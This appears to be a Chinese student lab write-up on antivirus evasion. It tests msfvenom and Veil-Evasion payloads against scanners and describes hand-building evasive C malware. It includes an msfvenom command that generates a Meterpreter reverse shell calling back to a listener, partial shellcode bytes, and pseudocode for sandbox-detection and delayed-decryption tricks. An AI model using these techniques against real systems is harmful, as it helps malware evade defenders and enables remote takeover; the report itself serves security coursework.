实验三 免杀原理与实践
1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
实验步骤如下
- 1.先对实验二中生成的exe进行检测
65款杀毒软件有36款认为不安全
39款杀毒软件有6款认为不安全
what??结果好像有点理想,但是实验还是要尴尬地做下去的 - 2.再试试用msfvenom生成其他格式的文件
1.java
看看测试结果
首先选择合适的payload
与exe文件相差无几
??2.jar
3.python
3.veil-evasion
效果很不理想,毕竟是世界知名的产品,早就被AV盯死了2.通过组合应用各种技术实现恶意代码免杀
很无奈,接下来利用c+shellcode半手工打造恶意代码1.首先在kali中以一个正常的exe文件作为模板生成shellcode数组
msfvenom -p windows/meterpreter/reverse_tcp -x lzj.exe LHOST=192.168.77.138 LPORT=5222 -f c
然后将它拷贝到win7主机的codeblocks中,加几行语句形成如下代码unsigned char met[] = "\xa6\xb2\xd8\x5a\x5a\x5a\x3a\xd3\xbf\x6b\x9a\x3e\xd1\x0a\x6a" ///省略若干行 "\x99\xe1\xaa\xef\xf8\x0c\x30\x5a\x09\xa5\x8f"; int main() {//执行shellcode }编译就可以得到一个能够成功回连的exe文件。
然而会被查出来,所以要用如下代码
```
unsigned char met[] =
"\xa6\xb2\xd8\x5a\x5a\x5a\x3a\xd3\xbf\x6b\x9a\x3e\xd1\x0a\x6a"
...省略一万字
"\x99\xe1\xaa\xef\xf8\x0c\x30\x5a\x09\xa5\x8f";int main(int argc, char * argv[])
{
//获取当前系统时间
//睡眠20000毫秒
//再次获取当前系统时间
//将两次时间相减看看是否小于19800
//如果小于,可能是AV在检测,停止运行
//如果大于,获取当前进程的内存,如果大于3500000 bytes,可能正在被检测,停止
//如果小于,查看当前文件名是否跟原先一致,若果不一致,停止
//否则解密shellcode、执行shellcode
}```
就能得到一个免杀的恶意代码了。
4.思考题
- 1.杀软是如何检测出恶意代码的?
1.静态检测,将代码与搜集来的知名度高的恶意代码比较。
2.启发式检测,将代码放到沙箱环境中运行,看是否会生成恶意代码或有恶意行为 - 2.免杀是做什么?
绕过AV的检测 3.免杀的基本方法有哪些?
加密shellcode、DLL注入、RunPE 等等
